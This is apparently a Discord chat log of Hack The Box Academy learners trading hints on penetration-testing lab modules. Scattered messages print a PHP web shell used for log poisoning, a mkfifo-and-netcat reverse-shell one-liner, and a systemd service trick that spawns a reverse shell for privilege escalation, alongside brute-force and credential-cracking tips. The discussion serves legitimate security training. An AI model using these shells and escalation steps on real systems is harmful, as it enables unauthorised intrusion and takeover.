#modules
1 messages · Page 15 of 1
I have to reset the target URL if I do anything:
And the timer goes down from 90 minutes to 3 minutes in 30 seconds, is this normal?
resetting, and the time left is 79 minutes down from 90 minutes in 1 second:
happens to me a lot as well
Hello, everyone! I'm new. I can't wait to get home to check HTB out
@late sail have fun
Thx
Hi everyone
was wondering if there was anyone I can msg about the last part of common applications - skills assessment 1
Did you find a solution to this? i'm having the same issue.
Hi Everyone! I am new to this. Please share some wisdom with me!
hi all, we've added a new section Pillaging to the Windows Privilege Escalation module: https://academy.hackthebox.com/module/67/section/1637 it's a fun section created by @mild mango and I recommend checking it out if you've already finished the section.
Hi guys, I'm stuck at the File Inclusions Skills Assessment. I have found ||the admin panel||, and I'm trying to ||poison the logs|| with ||a Host header <?php system($_GET['cmd']); ?>, then trying to run commands like ?log=system.log&cmd=id. I also tried the other logs, http.log and chat.log||, but nothing works. Am I on the right track with this?
hey man i have just finished it... i think log poisoning with that command won't work, restart the server and instead of "$get cmd" you could use "ls /"
you can find the result of ls / in the nginx log
also have you been able to find the lfi? @solar granite
Yep, that's how I found the ||admin portal||
also the command you are trying to run "?log=system.log&cmd=id" is wrong
What's the right one?
you need to dig more, you need to find the lfi of the admin portal
Right, I figured the logs in the portal are different from normal logs, but not why.
Thank guys, I'll check it out again later
Hi, can anyone help me? I'm lost (Footprinting Lab - Medium) in the database (SQL Server Management Studio), don't know how to find the password.
Hi friends --
I am working through the "Active Directory Enumeration & Attacks" course on Academy. I am stuck at this question:
"What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)"
The powershell command seems to time out. As a result, I am using Bloodhound but the two permissions I see are invalid answers. I understand the "ObjectAceType" is different than the "ActiveDirectoryRights" but cannot seem to get the correct answer. I am guessing I am missing something small.
Here's the URL for reference: https://academy.hackthebox.com/module/143/section/1485
@buoyant drum what is the problem
I have logged into SQL Server Management Studio but I can't find the password for the user "HTB".
I'm kinda lost. Need some hints about database name or path to the password.
You will find it, just keep searching for HTB
Thanks. I'll let you know.
i need to get from a file the pattern i specify and after that until the last / of the line, so basically from a point to another point of a file. How to?
yay... finally done with Linux Privilege Escalation
I suck at privesc
@queen gazelle DM me
Having some trouble figuring out "Using Web Proxies - Encoding/Decoding"
Could anyone give me a little nudge?
i believe we have to|| base64 decode three times and then do some more decoding||
yeah you do that and you start getting something that doesn't look like b64 anymore
guys. where are the instructions for the windows fundamentals skill assessment? like where do i create the new user that's needed? where do i add them to a group?
i don't remember them being in the "lectures"
we should be able to spawn a target machine and then RDP to it
yes i can do that but the skill assessment says i need to set up a few things and i don't know where
yes that's the challenge
then google gonna be my friend again lol
always be ready to use outside resources... many of our modules are "mostly guided" but there are absolutely times where we will make you do research on your own. Not sure if that's the case for Windows Fundamentals as I did that module like 11 months ago and can't remember lol
well i just went through the module and haven't found the info for where to create the user so im just gonna go with google now and see what happens
what up @west canopy !! How have you been bro?
living the dream dawg
lol i feel ya
Hello all,
I'm new to this and working my way through the beginning modules.
In the Web Enumeration module it says to add a DNS Server such as 1.1.1.1 to the etc/resolv.conf file. What is the purpose of this?
Thank you
that would only be necessary if you're having some sort of DNS issue
no need to edit anything on PwnBox
Isn't it also contributing to anonymity?
Broken Auth - Brute forcing Cookies -> "Tamper the session cookie for the application at subdirectory /question1/ to give yourself access as a super user."
What the heck is the username? Seriously, I've tried every admin name I can think of and none work. I even tried "Super User" and it says, "Unfortunately, as Super User you don't have any flag." This is the permission you told me to use!!!!
actually it says "as A" super user. not as super user. But dm me and I can help
^ can someone dm me I still haven't found it.
Thanks @silver zenith & @west canopy.
These modules and the vagueness/inaccuracies of the hints or what they're looking for, is getting extremely tiresome.
hey. I'm doing the bash scripting module. could someone who knows it PM me?
the question is
Create an "If-Else" condition in the "For"-Loop of the "Exercise Script" that prints you the number of characters of the 35th generated value of the variable "var". Submit the number as the answer.
and i got a number but it is not accepted as the correct answer
Have you considered that indexes start at 0 and not 1 ?
Well done !
Where is the password for the MSSQLSVC user found - Attacking Common Services - Attacking SQL DB's
I'm tired of going in circles
||look into unc path injection||
Can't help but just wanted to say it's cool to see you here too lol
I googled it and someone mentioned it was "super", which worked! I find some of these modules punish you on trivial things, even though you fully grasp the content that was taught
Yooooooo! Good to virtually see you!
guys. how do i check if a string contains another string in bash?
should i just go through the string char by char and check it? or is there an easier way?
what question are you working on
Comparison operators?
Can someone help me with 'FILE INCLUSION' Second assignment: Basic Bypasses | Everything I try, seems to give me 'Illegal Path Specified!'
yup. do you have any idea?
I do, dm me and we can see what you have so far and what you need
make sure you are using the right path ||/index.php?language=languages||
Has anyone experience with the STACK-BASED BUFFER OVERFLOWS ON LINUX X86 module? I'm stuck at the TAKE CONTROL OF EIP part. I don't know at which point I need to take the EBP. Does anyone know?
It's the one! I've tried all the options given in the instructions and even combined them, while URL encoding everything and I still only get illegal path
DM me
Can anyone provide some guidance on the File Transfers, Window File Transfer methods first question?
use wget
dm me
Little embarrassed as this shouldn't be stumping me but I use that. Shouldn't the command be ||wget http://(IP)/flag.txt?||
exactly
Weird, I did that command earlier and didn't work, must've been something on my end. Thank you.
Dm
can someone help me with command injection skill assessment. I get bad request
dm me
Hey guys, stuck at intro to network analysis - tcpdump fundamentals
question 1 & qs 4
Could I have some help on the footprinting Snmp section?
Find it a bit confusing
I would say Cpts goes over much more information than OSCP. I haven't done OSCP but looking at the syllabuses of both it looks like HTB goes much much deeper. CPTS can be a good way to prepare, but you might also need to do the buffer overflow modules and the corporate osint module.
so i can't find my note on this module but for question 1 check the first line of the images and for question 4 hint you will need ||2|| tag and you have to include sudo tcpdump in the answer
I completed the module, what is it that you are stuck on?
can I dm you?
sure
Hey @tranquil zodiac! You are correct -- I am sitting for the OSCP on December 8th. To be honest, I am really disappointed with Offensive Security as an organization. I paid $1,500 for 90 days of access to the PEN-200 course and their labs. The course itself is just a large, outdated .pdf which does a terrible job at teaching the concepts. The labs are shared between ALL students so you don't even get dedicated VMs even though I am paying $500/month. Their new "flag submission" process is just a sub-par version of TryHackMe or HackTheBox.
I am still planning on passing the OSCP due to the name recognition but I sincerely hope orgs such as HTB, THM, and TCM Security begin taking over. Offsec has turned into a greedy organization with bad infrastructure and terrible support
Nevermind. It was pretty easy.
HTB Academy has been excellent. I am working through the AD Enumeration & Attacks course. It's really really good. This is what I was expecting from PEN-200. I cannot say with certainty if it will prepare me for the OSCP simply because I have not taken it yet... But I CAN say it will do a better job than the $1,500 bloated PDF that Offsec gives you.
Holy shit based as Fuck
I like hackthebox because the price is very reasonable
especially if you are a university student
amazing bang for buck
Lel, I am stuck on how to properly upload a zip file to my target machine on the File Transfer Windows section. Any help? I tried using wget post method however the file is empty on the target machine.
HTB has taught me more than my university haha
Same haha
I really hope hackthebox academy adds some more certs, and fixes some of the modules/sections. Because if that happens it will be by far the best place to learn hacking.
Currently working towards the new Penetration tester specialist cert
Yeah, academy is solid. I honestly cannot describe how terrible the Offensive Security teaching and infrastructure is compared to HackTheBox. It's night and day. As a student, you get access to a forum that's full of weird riddles because you're not allowed to give any type of spoiler. The organization's motto is "Try Harder" because they suck at actually teaching concepts so they push the blame onto the students. I'm really hoping I pass the OSCP so I can make a video on my YouTube page explaining all of this without looking like a sore loser
I'm so glad I am doing academy instead of OSCP
Shameless plug but if you want to follow my journey, I am documenting the process on my page -- https://www.youtube.com/c/TylerRamsbey
Hello everyone! I post videos on cybersecurity, education, leadership, and all things pertaining to the world of IT!
Let's connect:
Twitch: https://twitch.tv/hack_smarter
Facebook: https://www.facebook.com/tylerramsbey22/
LinkedIn: https://www.linkedin.com/in/tyler-ramsbey-86221643/
Discord Group: https://discord.gg/Dme8C8BbZ4
Glad you are enjoying the content
Agreed. I think they got a bit comfortable being the only practical security cert for so long.
yooo what's up @unique valve
Could someone help me out, I'm on the Shells & payloads 2nd host || I found the exploit it wants you to upload on to the server but when I add it to the metasploit folder I can't find it to start the exploit||
Try selecting the exploit even though it's not showing when you try to search for it.
Sup my guy!
How do I do that?
Hey all, are there any modules focusing on jwt attacks? I'm working on some challenges related to jwt attacks, and don't find much on HTB acad sadly. Already tried a lot of stuff (none alg, alg confusion, playing with self-signing JWS, JKU, lfi/sqli with KID etc...) but can't manage to solve this chall, so if you have any resources or knowledge to share i'd like to take it
nothing on json web tokens in academy but i am fairly certain we have something coming soon, I can check with zeyad
nvm I figured it out
In msf type "use <path to exploit module>"
okay thanks for letting me know
Are you able to run the exploit for host 2?
|| I got an error with the script, going to double check if maybe how I passed it to the host failed ||
I found the exploit it wanted however when I loaded it into metasploit, fill out the options, and run it I receive an error.
Subscribed! By the way this is actually the type of content that I find useful... can't stand stuff from big Youtubers "HACKING WIFI HAS NEVER BEEN THIS EASY" gtfo lmao
I received the same issue. Got frustrated and decided to work on another module for the time being lol.
looks good, found already a vid that i want to watch:)!
has anyone completed the attacking enterprise networks module? struggling with it
where are you struggling my dear?
not sure how to do this "Perform a banner grab of the services listening on the target host and find a non-standard service banner."
i tried a command line including dimtry -pb but had no luck
i think I was able to get it with nmap -A
which section and question #?
first section first question?
Really think they should add a section for this in one of the web modules
I was doing the Box "Secret" and had no idea wtf a JWT was
its coming very soon I just got confirmation
not even BSing you lol
external information gathering and question #1
thank you!
Anyone new that wants to learn with me?
Could someone lend me a hand on box 2 of Shells & payloads? || i'm trying to run the metasploit and i've set the vhost to 172.16.1.12:80 but I still can't get it to execute||
try setting it to the ||subdomain "blog.inlanefreight.local"||
|| ughhh that worked thanks. I was so close ||
oh btw i also need help with that section but on question 3, i have no idea what subdomain that question want
sec I will DM
sure thanks
hello folks, 2 more and i finish my BBH path. Server Side Attacks done and easier than i thought https://academy.hackthebox.com/achievement/433014/145
A backend that handles user-supplied input insecurely can lead to sensitive information disclosure and remote code execution. This module covers how to identify and exploit server-side bugs. This module introduces Server-Side Request Forgery (SSRF), Server-Side Template Injection (SSTI), and Server-Side Includes (SSI) injection attacks, alongsid...
fantastic!!!
Thanks a lot again @vital adder and @lethal atlas for helping me with the Broken Authentication where i lost so much time stuck
is kali linux free ?
Yes
no the license is 69 USD
He is kidding about that
its 1 bitcoin
hello everybody
when i upload: <?php system($_GET['cmd']);?> for a reverse shell, and after do cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc MYIP PORT >/tmp/f (in burp with url encoding)
shouldn't I be able to gain a reverse shell with netcat?
if after you upload that you can run commands and also the target machine has netcat installed then yes i think you should be able to get a rev shell
ah thanks... you might have helped me where the problem is ;)!
How can I pass a base 64 string to windows then have it output it as a bat?
folks, Once I sign up on the HTB Academy with my student account, is there a limit till when the student account will remain active or will it remain active till the time that particular E-Mail is functioning?
i think the only time it's gonna be deactivated is when your email account is deleted or if you don't pay for a few months.
could someone help me with the bash scripting module. I'm kinda stuck at the flow control - loops part. I don't know much about bash
Can I speak to someone about getting stuck in the Footprinting module?
i am pretty dumb at bash too but if you need help shoot dm me with your script
sure what's issue?
can I talk to you in private?
sure
Does anybody else have issues with getting disconnected from the connection pack constantly when working with modules?
Dont know
I do everything on pwnbox
Omg
Fqdn
Must give some respect to htb staff. I'm really enjoying this platform. Academy is freaking awesome
Even with easy modules i knew pretty well i am still learning new things
same, it's a joy
It is kind of inspiring
Yes we love to hear this!!! A lot of love goes into our content
yo guys, I have a question... I'm about to have my first contact with HTB and I don't know what to pick between TCP or UDP at the ovpn... wouldn't it be a no brainer to pick TCP?
anyone do this part in attacking enterprise networks "Perform a DNS Zone Transfer against the target and find a flag. Submit the flag value as your answer (flag format: HTB{ })." .. I'm trying to use dig (my target IP) -t ns
you are basically using dig to find the ns record not a zone transfer
what would be a better command? still using dig?
a better command would be the zone transfer command
you can use google or the example command for that
yeah google told me to use that command i first tried
oh yea you can use the ns subdomain for the zone transfer or you can just use the target ip both work fine for me
okay i guess I'm just confused what I'm looking for and what HTB wants for the answer
HTB{qraardra}
the qr ra rd ra is the only flag i can find
hint try the given example dig command
thank you!
Attacking Enterprise Networks is the capstone module of the Pentester path. Have you done any of the other modules?
So I just finished the Shells & Payloads Module and for host 3 || I was able to successfully complete it with the intended Metasploit module but I'm curious about going about another way. || || I was able to get a webshell on it but it only got me www user access, how would you go from there and escalate yourself to full privileges? I was thinking I could use msfvenom to make a package then push it on to the host via my webshell then use the reverse shell for a stronger attack interface. || I'm just curious if anyone else had a more unique solution
Struggling to pull a file from an RDP session within one of the modules, could anybody possibly assist?
Got a question about the public exploits bit for the getting started module. I have the target IP, I'm pretty sure I know what I need to be searching for with searchsploit, but there's so many options and after that, no idea how I'm supposed to find the right one for metasploit considering there's multiple options for that too
or maybe the answer lies with the error I get when running nmap that says that 1 service unrecognized despite returning data
sometimes ya just pick one to investigate and go for it. But ideally youre gunna wanna try specific version numbers if you can
I might be missing something because doing a search with the specific version number brings up one result, but I'm unsure where to go from there
read about the result
I don't see how to take the info I get with searchsploit and apply it to metasploit, if that makes sense. I've googled the service plus version to see about exploits and I've found some but I don't understand how to apply that to metasploit to advance with the problem. In the example for the module, they just googled and got the name of an exploit to search. That isn't the case here
have you tried the msfconsole search functions to find the module listed by your searchsploit result?
presuming your result was a .rb metasploit module
the result was not a .rb, but a .txt. Do I need to be keeping an eye out for a .rb result with searchsploit?
if you want to use metasploit yeah. But if you got a .txt you should read it, not all exploits need to be used with metasploit
it could be something simple that can be done by hand
but that module probably does want you to use metasploit for this first one. So dont be afraid to search for other service versions you find to see if something easier reveals itself
I'm wondering if that unrecognized service has anything to do with the answer because it feels like I'm running in circles, unless there's a sudden spike in the learning curve all of a sudden. All previous questions have been solved with a few minutes of rereading the content on the page, at most
I'm having the issue with trying to change the passwd for the admin acct, were you able to figure out?
Yes. Did you get the ||UID and Token|| of the admin account?
You can include a drive like this
xfreerdp /u:username /p:password /v:IP /drive:data,/tmp
hi
alright so, just to confirm I'm not on some wild goose chase and I'm actually on the right track, nmap shows two ports open and one service unrecognized despite returning data. One of them is the domain service, while the other is http with Apache httpd 2.4.41 ((Ubuntu)). It's the latter I want to search for exploits, ye?
Dont remember off the top of my head. Its worth checking out the web server there though, it definitely could be running a web app that could be the target you need to exploit.
I remember a couple of the pages in that module requiring that
and how would I go about doing so?
alright figured lol. I just want to make sure I'm not missing anything
anyone on now that's done password attacks module - hard assessment give me a tip or hint? Haven't made any progress yet into this assessment. Used hydra on some services and it was giving false positives and right now brute forcing smb with crackmap.
are you scanning for the right user, and are you using the basic wordlist or the modified rulelist with the custom rules.
in the assessment scenario description they give you a username johanna. So been using that as the user name and bruteforcing with mut_wordlist with custom rules and rockyou.
cool guess ill just wait for crackmap then to find something
Yep thank you found Johanna creds
I'll give this a try
That worked, thanks!
I feel dumb, I can't get gobuster to run. Keeps timing out and I'm certain it's because I don't have the url scheme correct. The frustrating part is I got it working earlier lol
Let's see your command.
gobuster dir -u http://46.101.17.112:32316 -w /usr/share/dirb/wordlists/common.txt
Like I said, I'm certain it's something simple I'm just missing. I'm long due for a break, but I'm so close to cracking this module problem
do you get an error message? The command seems to look good to me at first glance.
Error: error on running gobuster: unable to connect to http://46.101.17.112:32316/: Get "http://46.101.17.112:32316/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
url is fine because it brings up the webpage in a browser
gonna try restarting the VM and seeing if that helps
sanity check 1. sure its http and not https
webpage has the lock crossed out, which indicates http, no?
idk I never pay attention to the lock I just look at the url and see if http proto is being used or https proto
mmkay then yeah your command looks sane so idk
well that'd do it
is the correct ip http or https
gobuster dir -u http://46.101.17.112:32316/ -w /usr/share/dirb/wordlists/common.txt
might be time to look into how to use ffuf
are you able to curl the page
....huh, curling brings me to the default welcome page used to test the correct operation of the apache2 server
well its something
okay there we go. I just entered something wrong. Copying and pasting the url from the browser for curl does indeed bring me to the wordpress page
maybe just latency screwing you some then for gobuster
could be. So a "try again later" deal?
use the --timeout flag to give it some extra time
that worked
latency it is then
Might be time to restart the router lol
I've noticed that Golang's default socket timeouts tend to be pretty punishing
I'm 80% sure it's why amass doesn't work with tor and it baffles me they don't have a timeout flag
welp solved the problem. I was overthinking things WAY too much, but it led to some troubleshooting and research practice, which I feel I'm gonna need in the future. So can't complain too much
this has also made me realize I can't wait for cyber monday to nab a pair of monitors. One screen, even if it's a tv, isn't enough lol
In password hacking hard lab - are we supposed to ||mount the bitlocker vhd file using guest mount and then pass in the passphrase to unlock it? I cracked the password to it but cannot get it to mount for the life of me||?
Yes
you can also try mounting it in a windows install too
except I don't think guestmount worked for me, pretty sure I used something else, idr
Yeah I was having zero luck with it
I remember spending like a solid half hour googling things to get it to mount
oh just remembered what I used
ntfs-3g
google that and some relevant additions and youll find what you need
Appreciate it, I'll give it a chance
hi someone help me with Linux Local Privilege Escalation
What's your question?
Need help
Path: Penetration Tester
Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: Password Spraying - Making a Target User List
Question: Enumerate valid usernames using Kerbrute and the wordlist located at /opt/jsmitht.txt on the ATTACK01 host. How many valid usernames can we enumerate with just this wordlist from an unauthenticated standpoint?
https://academy.hackthebox.com/module/143/section/1455
Command executed:|| kerbrute userenum -d inlanefreight.local --dc 10.129.22.219:3389 jsmith.txt||
This IP|| 10.129.22.219|| was generated by htb and logged in as ssh
Idk what I'm missing? I'm getting an error with this command
I ended up mounting this and cracking the sam hash, how do I determine which service the creds are used for?
you try em!
Is anyone available to help on the Nibbles module ?
I can't upload the image.php file through the image uploader on the blog by using msfconsole and using the exploit. I've researched the problem I am having and it seems common. I just haven't had a solution that works for me.
here is the error im getting
[!] This exploit may require manual cleanup of 'image.php' on the target
Lol I figured it out. Man it's always so simple. Just had to fill out all the fields.....duh
Hey all, having some issues with the Linux Fundamentals module
Currently i'm VPNed into the Academy through the .ovpn file provided when you click Get VPN Key
It's asking me to ssh into a machine with the given credentials, however when I run ssh htb-student@<machine address> I get a Connection Timeout in return
just checking, to connect to vpn you used sudo openvpn, and you left the terminal tab open yes?
I did sudo openvpn academy.ovpn and yes i left the window open
Gave that a try, no dice
are you working on windows or a system based on linux?
I see, actually i did that module yesterday and i didn't have any problems, let me check again if there's something that you are missing
If it's relevant, this is what i'm seeing
Working for me, the only thing that I think is happening is that your target (time left) is over so you need to reset the target.
Just regenned the target and still nothing
ping 10.129.102.63
PING 10.129.102.63 (10.129.102.63) 56(84) bytes of data.
^C
--- 10.129.102.63 ping statistics ---
8 packets transmitted, 0 received, 100% packet loss, time 7012ms
Well that'd explain a lot
yep, that explains all xd
The machine has to be online otherwise i'd get a Destination Host Unreachable right?
Yes
ip addr, ensure you have the connection to the vpn working
15: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 500
link/none
inet 10.10.14.151/23 scope global tun0
valid_lft forever preferred_lft forever
inet6 dead:beef:2::1095/64 scope global
valid_lft forever preferred_lft forever
So weird
Perhaps its my system itself
It's Android 10 with LineageOS 17.1 running a Kali NetHunter chroot so maybe the host OS doesn't like routing traffic through the tunnel
could be, I'm running a vm on windows, that vm is a kali linux and I don't have any problem :/
thanks for the tip. I just solved it. One question btw, typically we use common.txt or small-2.3-txt to search for hidden files. but here it's in some number.html file, in the real world are we expecting this? I'm new to cybersec sorry for the silly question.
we can expect something in the real world too but in terms of other file extensions like pdfs etc
how to learn everything from scratch ?
hello everyone please can someone help with the file inclusion module final assessment ??
thanks
Did you carry it out from the attack machine? It's the intended solution and in that case you can just use dc 172.16.5.5 like the example shown I believe. You'll also have to be in the directory of the jsmith.txt file in your command.
Is anyone else having issues with the Active Directory enumeration and attacks lab? Since yesterday I keep on getting a 'system error 110: Connection timed out' on both VM and Pwnbox when RDPing in to the attack machine.
Hi guys, need some help with File Inclusion skills assessment. I got the ||admin portal||, found the lfi there, and I can access files on the system. I'm now trying to ||poison the logs with curl -s "http://IP/ilf_admin/index.php" -A '<?php system($_GET["cmd"]); ?>'||, but it doesn't show up in the logs. I then try to execute commands with ||http://SNIP/access.log&cmd=id||, but I don't get the output of my command anywhere
Edit: I also tried executing commands like ||curl -s "http://IP/ilf_admin/index.php" -A '<?php system("id"); ?>'|| but it doesn't work either
Edit2: be mindful of quotes usage. It works with ', but not with " in the payload. Also make sure your payload is ||just a command you want executed, not the $_GET... thing, as it never worked for me||
I'm not sure about this exercise but you should put a ? after your .log instead of &
poison /proc/self/environ
And see results on log files
Can I break the webapp by doing it wrong? After a few unsuccessful payloads it seems to not log anything anymore
I'm trying it like curl -s "http://IP/ilf_admin/index.php?log=../../../../../proc/self/environ" -A '<?php system("id"); ?>', and /proc/self/environ gets www written inside, then it stops logging requests
I'm using & because there's already an ?
Accessing the logs is like index.php?log=...&cmd=id
@solar granite i had this issue, after some time/logs it stopped logging
What if you just send your payload as a parameter in your url
Still doesn't work, I try /index.php?log=%3c%3f%70%68%70%20%73%79%73%74%65%6d%28%24%5f%47%45%54%5b%22%63%6d%64%22%5d%29%3b%20%3f%3e (which is <?php system($_GET["cmd"]); ?> url-encoded). Then I try to access it like index.php?log=../../../../../var/log/nginx/access.log&cmd=id, but I don't get code execution
It does get logged tho, the requests appear in access.log
Update: it works with ', but not with " in the payload
Solved
hello hello hello
Anyone in the academy on module 18, the Linux fundamentals?
I am trying to exploit a Stack-based buffer overflow, the shellcode is in the pics. But if I try to run the command in gdb and set up the netcat listener on the same port I don't get any response in the netcat log. is the shellcode right? Or is something else the problem?
Anyone for the last section on attacking common applications ?
ohh that makes sense. I didn't do it from the attack machine. It worked now thanks!
shoot me a dm if you still need help with that
what's the issue?
long time no see @vital adder
Hi, I need help on Password Attacks/Password Mutations. I've tried many things to reduce the list but without success
if it's taking too long cut the first ||17000|| password
Thanks. it works. I thought the solution was a clever way to reduce the list, not a random magic number.
if you include & after your openvpn command you can close the window and still keep your vpn connection. Just an FYI
@hexed bison try using the sed commands in the examples to keep only the passwords that are policy compliant. Try my script that i shared here in the channel to achieve the same results. Around 14k passwords to test
And do not try the mangling option. You'll not need it
I think this is the problem : I do not know what the policy is
@hexed bison the same as in the examples. Otherwise, try to create a new account and check the requirements
Besides when you find out the first web creds, they suggest you to change your password and they set you the policy
I think we are not speaking about the same section
I'm speaking of the skills assessment of the module
The sections will be solved just by repeating the steps of the section
Anyone able to help with SQLMap Essentials: 'Running SQL Map on an HTTP Request' question 2? The hint says "Try to see where the 'id=1' is sent, and specify this location as the injection mark." I have no idea where to even start. Maybe it's just a Friday thing, but I'm throwing commands at the wall.
i'm speaking about the 5th section of the module, and no information about policy and no web server to connect to. Only a user login and some files
but Thank you, I'll use it later
@simple dragon inspect the request and add an * next to the id=1
got it. thanks!
Hello, Is there any free learning path blog for HTB the one similar to THM?
So far no luck thanks!
nope for htb academy the only free module is the tier 0 module
Hey all! I'm having problems with password attack lab - hard. I was able to find ||Johanna|| creds, download ||keepass|| file, crack ||keepass|| file, get ||David|| creds, log into ||smb|| and get .||vhd||, crack .||vhd|| and obtain the cred (warning huge spoiler -->) ||123456789!||. I upload the .||vhd|| file to ||Johanna||'s windows session to open it with the cred I found but it doesn't work. Any hint please?
oh you don't have permissions to mount stuff on the target machine
mount the ||.vhd|| file on your machine (guestmount doesn't work)
I tried with virtualbox. I used the .||vhd|| to boot the machine but it doesn't work. Am I doing something wrong?
oh no this isn't a virtual machine drive this is just a ||bitlocker encrypted partition||
you can just mount this on your windows
Ah I see thanks!
question about the Bug Bounty Hunter certification exam. Was the exam content outsourced, or was it done in house?
done in house afaik
@thorny glade I've tried both and I prefer HTB by far, in THM the content is too spread out. It is hard to follow a thread of knowledge. Not like HTB. You can look at Portswigger also
```
find / -user root -perm -4000 -exec ls -ldb {} \;
```
I used this to find files that belong to root, that I have access to, and that are executable.
```
priv=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip] [port] >/tmp/f"
[Install]
WantedBy=multi-user.target' >$priv
/bin/systemctl link $priv
/bin/systemctl enable --now $priv
```
@solar granite pass the GET parameter into the system command and see the results in the log files, that's what I did
Thanks. I came to the same solution after a while. I was trying it with " (double quotes) instead of ' (single quote) as well, which didn't work and took me forever to figure out
Completed the assessment?
Yes
ok now that I know the answer there is finally a clever way to do it. there are 3 ways to increase the requests/m. When you use a tool for the first time you should be curious. when you encounter a target for the first time you should be curious
is there anyone else that has issues with the Help message box??
I am in the Linux Privilege Escalation Module on the Special Permissions section. I am trying to answer the question asking for the file where setuid bit is set. I am trying to submit a file name, path, and everything but I can't seem to get it right. Can somebody point me in the right direction of what I am supposed to be submitting?
Does HTB start assuming no knowledge, or do I need to know any languages before I start?
yep DM me π
do you mean like programming languages?
Yea
nope no programming knowledge is needed
you'll be using bash and python scripts, some modules absolutely require SCRIPTING knowledge
Cool, I have another question: do the skills on the course apply to malicious hacking, like the stuff most people would think of if you said hacking? Or is that done differently to this?
Academy at the moment is mostly focused on pentesting web and infrastructure.
we certainly hope you choose to be ethical
I sent you a DM Jared
the training we offer is agnostic, how you choose to use it is up to you. But yes you will absolutely learn what real threat actors are doing
hi guys i am doing AD module and i am stuck on this Find the name of an account with a ServicePrincipalName set that is also a member of the Protected Users group
when i do the below command i get only 2 users: kerberos and sqlqa
Get-ADUser -Filter "adminCount -eq '1'" -Properties * | where servicePrincipalName -ne $null | select SamAccountName,MemberOf,ServicePrincipalName | fl
any advice?
Oh I did not realise, so hacking training is available freely, you just trust everyone
Oh duly noted, thanks!
The process of attacking networks and the process of protecting networks are similar.. Making the cybersecurity landscape as transparent as possible actually increases security.
I'm doing cracking the box, knowledge check. I finally got root access using php to exec('/bin/bash'), but the terminal shows no output for anything I do.
There's many ways bad guys can go about learning stuff and they'll keep nuggets of info secret amongst their friends and associates as much as possible. Making hacking knowledge as widespread as possible sure increases the amount of bad actors out there, but it dramatically increases the number of good actors as well, far more than the downside.
There are some differences between what's taught in academy and say malicious hacking though. But that mostly boils down to the fact that good guys don't need to worry about attribution or opsec as much (in the sense that the main opsec considerations for good guys are preserving client data and secrets during an engagement).
Bad actors also often have more time to play with, which means they can opt for slower, stealthier, more methodical approaches (which can be a requirement for avoiding said attribution and getting caught.)
pentesting and irl hacking a little different but similar
like a good guy doing a bug bounty program can just fire up their browser and burp and just go for it. A bad guy is going to have to chain stuff through tor and proxies, go slower due to increased latency, and also must be able to leverage findings deeper. All of which is going to affect their tactics techniques and procedures
Could I have help with footprinting lab - hard
Don't know what exactly is the community SNMP string
community default is public, otherwise brute it
I bruted it with onesixtyone
then use it with some of the recommended tools for enumerating snmp from the module on it
fair warning it's a ton of text and is basically like looking for a needle in a haystack but you'll know what you're looking for when you see it
I'm using snmpwalk but don't know if I should use the full string
For example should the community string look like "Linux htb 5.11.0-34-generic #36~20.04.1-Ubuntu SMP Fri Aug 27 08:06:32 UTC 2021 x86_64"?
do you know what is the basis for the recommendation of boxes when you finish a module? I can't find the relationship between the Network enumeration with nmap module and the suggested boxes.
I'd recommend rereading the snmp page. The actions you need to perform are nearly copy paste right from the examples
oh I wasn't able to get snmpwalk to work for me in this part, but hint: you can use a different tool shown in the snmp section
also snmpwalk -v2 is for version 2
any advice on this?
Ok that makes much more sense
Deleted in case someone else searches this topic
I don't mind dropping an answer when it's literally right in front of you but you just don't know what part of the output is relevant lol
would recommend deleting your image as well to avoid spoiling someone else either
I will
Not helpful but to not leave ya hanging, I haven't done that module yet so not much advice I can give, other than you can use another command to list users in the protected users group and then just cross-reference them.
https://everythingsysadmin.wordpress.com/2013/07/16/detecting-members-of-protected-groups-within-ad/
thanks, also with those commands i get the same: krbgt and sqlqa
then sounds like you've got two users that are valid
yeah i have tried both of them but i get wrong answer
with the following command:
```
PS C:\Users\htb-student> Get-ADUser -LDAPFilter "(admincount=1)" -Properties * | where servicePrincipalName -ne $null | select name
name
krbtgt
sqlqa
```
try without the where servicePrincipalName and just see what users you have that fall under the protected ones in the first place
```
PS C:\Users\htb-student> Get-ADUser -LDAPFilter "(admincount=1)" | select SamAccountName
SamAccountName
Administrator
krbtgt
daniel.carter
sqlqa
svc-backup
svc-secops
cliff.moore
svc-ata
svc-sccm
mrb3n
sarah.lafferty
jenna.smith
harry.jones
trisha.duran
pixis
Cry0l1t3
knightmare
```
got this and i have tried all of them
but no lock
luck
¯\_(ツ)_/¯
Maybe I'll be of better help when I get there. I think it's the module after the one I'm currently on. But hopefully you'll get past this by then.
@west canopy i'm sorry but i do not agree with the statement of we do not need any programming knowledge to start. It is true that they give you many examples of the scripts needed but... Someone with no idea of what the script does like @craggy kernel probably will struggle a lot to complete even the sections of the academy on middle difficulty.
Is it free to host a CTF event in hackthebox CTF platform?
right but the content is mostly guided, if you have to use a python or bash script we show a sample command
so its not actual programming
just knowing linux to use the scripts
or modifying a script. Script modification is not the same as knowing a programming language
I would say a basic understanding of what the scripts are doing. I say it because I have people asking me things like what the scripts on the IDOR sections do. I mean it is the most basic, a loop calling curl on every cycle, but even that they do not understand
depends on the module right
which I think I said, some modules absolutely require scripting knowledge
There's also a difference between not needing to know any to start, and never picking any up on the way.
You need to eventually learn some scripting at a minimum, it's unavoidable
honestly don't think programming is that difficult compared to pentesting. Pentesting much harder
Cry0l1t3's bash module took 5 years off my life
you still did it though
I think it should be a basic module like Tier 0 where you teach what is a variable, a loop, a function, a type. It could help a lot the beginners
isnt there a module like that already?
i think its 50 cubes
Have at it boys!
50 cubes is reachable as F2P? I do not know the prices really, I just paid
its a different way of thinking... programmers build systems, pentesters break and manipulate them
So a basic knowledge of py and bash is recommended?
Or you could spend a grand total of five united states dollars to purchase the cubes
it definitely helps
@craggy kernel absolutely, not exactly bash or py but the basics of any programming language
Ohh ok that's fine then
Actually I don't know can you get 50 cubes from a free account?
yes
There you go, Cry0l1t3 will torture you for free
Cool then, I'll start redirecting people to that module then
Could I get some help on logging in with IMaps/pop3 on the Footprinting hard module?
